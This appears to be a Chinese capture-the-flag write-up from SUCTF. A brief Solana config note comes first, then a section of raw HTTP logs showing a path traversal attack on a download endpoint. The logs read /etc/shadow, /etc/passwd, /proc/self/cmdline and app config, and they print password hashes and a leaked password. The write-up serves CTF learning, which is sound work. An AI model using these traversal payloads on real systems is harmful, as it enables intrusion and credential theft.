suctf

onchain checkin

[toolchain]solana_version = "2.0.20"anchor_version = "0.30.1"[provider]cluster = "devnet"solana_version = "2.0.20"这是指定使用的 Solana 版本。在这个例子中，指定了 2.0.20 版本。Solana 是一个高性能的区块链平台，版本号可以确保使用正确的功能和修复。anchor_version = "0.30.1"这是指定使用的 Anchor 版本。Anchor 是一个为 Solana 区块链提供的框架，旨在简化智能合约的开发。0.30.1 是指定的版本号，确保开发者使用的是特定版本的 Anchor。cluster = "devnet"这是设置 Solana 的集群环境。devnet 是一个为开发者提供的测试网络，类似于一个沙盒环境，适合开发和测试。在这个环境中进行的操作不会影响到真实的 Solana 主网

SU_check

GET /download?filename=../../../../../../../../../root/flag.txt HTTP/1.1Host: 192.168.58.128Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;
q=0.9,image/avif,image/webp,image/apng,*/*;
q=0.8,application/signed-exchange;
v=b3;
q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;
q=0.9HTTP/1.1 200 Content-Disposition: attachment; filename="../../../../../../../../../root/flag.txt"Content-Type: application/octet-streamContent-Length: 7Date: Thu, 09 Jan 2025 06:59:21 GMTKeep-Alive: timeout=60Connection: keep-alivenononoGET /download?filename=../../../../../../../../../proc/self/cmdline HTTP/1.1Host: 192.168.58.128Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;
q=0.9,image/avif,image/webp,image/apng,*/*;
q=0.8,application/signed-exchange;
v=b3;
q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;
q=0.9HTTP/1.1 200 Content-Disposition: attachment; filename="../../../../../../../../../proc/self/cmdline"Content-Type: application/octet-streamContent-Length: 65Date: Thu, 09 Jan 2025 06:59:26 GMTKeep-Alive: timeout=60Connection: keep-alivejava.-jar.suctf-0.0.1-SNAPSHOT.jar.--password=SePassWordLen23SUCTGET /download?filename=../../../../../../../../../root/start.sh HTTP/1.1Host: 192.168.58.128Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;
q=0.9,image/avif,image/webp,image/apng,*/*;
q=0.8,application/signed-exchange;
v=b3;
q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;
q=0.9HTTP/1.1 200 Content-Disposition: attachment; filename="../../../../../../../../../root/start.sh"Content-Type: application/octet-streamContent-Length: 1Date: Thu, 09 Jan 2025 06:59:32 GMTKeep-Alive: timeout=60Connection: keep-aliveGET /download?filename=../../../../../../../../../proc/self/cwd/BOOT-INF/classes/h
int HTTP/1.1Host: 192.168.58.128Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;
q=0.9,image/avif,image/webp,image/apng,*/*;
q=0.8,application/signed-exchange;
v=b3;
q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;
q=0.9HTTP/1.1 200 Content-Disposition: attachment; filename="../../../../../../../../../proc/self/cwd/BOOT-INF/classes/hint"Content-Type: application/octet-streamContent-Length: 27Date: Thu, 09 Jan 2025 06:59:38 GMTKeep-Alive: timeout=60Connection: keep-alivealgorithm=PBEWithMD5AndDESGET /download?filename=../../../../../../../../../etc/shadow HTTP/1.1Host: 192.168.58.128Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;
q=0.9,image/avif,image/webp,image/apng,*/*;
q=0.8,application/signed-exchange;
v=b3;
q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;
q=0.9HTTP/1.1 200 Content-Disposition: attachment; filename="../../../../../../../../../etc/shadow"Content-Type: application/octet-streamContent-Length: 909Date: Thu, 09 Jan 2025 06:59:43 GMTKeep-Alive: timeout=60Connection: keep-aliveroot:$6$MI.uuGSS7qKn4rEK$NlYB/kaAeRmd3CYY4mxDuMMMh1PzQZHTEL.BV3Dosp.15kD3MgSDzqbYRRazeglIRVAfe6ATwRZ9ekSwNTkit0:20077:0:99999:7:::daemon:*:20007:0:99999:7:::bin:*:20007:0:99999:7:::sys:*:20007:0:99999:7:::sync:*:20007:0:99999:7:::games:*:20007:0:99999:7:::man:*:20007:0:99999:7:::lp:*:20007:0:99999:7:::mail:*:20007:0:99999:7:::news:*:20007:0:99999:7:::uucp:*:20007:0:99999:7:::proxy:*:20007:0:99999:7:::www-data:*:20007:0:99999:7:::backup:*:20007:0:99999:7:::list:*:20007:0:99999:7:::irc:*:20007:0:99999:7:::gnats:*:20007:0:99999:7:::nobody:*:20007:0:99999:7:::_apt:*:20007:0:99999:7:::systemd-timesync:*:20077:0:99999:7:::systemd-network:*:20077:0:99999:7:::systemd-resolve:*:20077:0:99999:7:::messagebus:*:20077:0:99999:7:::sshd:*:20077:0:99999:7:::hacker:$6$rzdplO02wm/607Io$v9gjdKBiuEdA0F28qx1REs/L4Qo9dqBQD.fUUjans5qn/sWOjSffHWzlMvgwzxHyyrfSA8kLilzMMRGhRNHLk0:20077:0:99999:7:::GET /download?filename=../../../../../../../../../proc/self/cwd/BOOT-INF/classes/application.properties HTTP/1.1Host: 192.168.58.128Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;
q=0.9,image/avif,image/webp,image/apng,*/*;
q=0.8,application/signed-exchange;
v=b3;
q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;
q=0.9HTTP/1.1 200 Content-Disposition: attachment; filename="../../../../../../../../../proc/self/cwd/BOOT-INF/classes/application.properties"Content-Type: application/octet-streamContent-Length: 133Date: Thu, 09 Jan 2025 06:59:47 GMTKeep-Alive: timeout=60Connection: keep-alivespring.application.name=suctfserver.port = 8888OUTPUT=ElV+bGCnJYHVR8m23GLhprTGY0gHi/tNXBkGBtQusB/zs0uIHHoXMJoYd6oSOoKuFWmAHYrxkbg=GET /download?filename=../../../../../../../../../etc/passwd HTTP/1.1Host: 192.168.58.128Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;
q=0.9,image/avif,image/webp,image/apng,*/*;
q=0.8,application/signed-exchange;
v=b3;
q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;
q=0.9HTTP/1.1 200 Content-Disposition: attachment; filename="../../../../../../../../../etc/passwd"Content-Type: application/octet-streamContent-Length: 1322Date: Thu, 09 Jan 2025 06:59:53 GMTKeep-Alive: timeout=60Connection: keep-aliveroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:x:100:65534::/nonexistent:/usr/sbin/nologinsystemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinsystemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinmessagebus:x:104:106::/nonexistent:/usr/sbin/nologinsshd:x:105:65534::/run/sshd:/usr/sbin/nologinhacker:x:1000:1000::/home/hacker:/bin/bash

主要是把密钥找到，密钥少了四位，补全解密就行。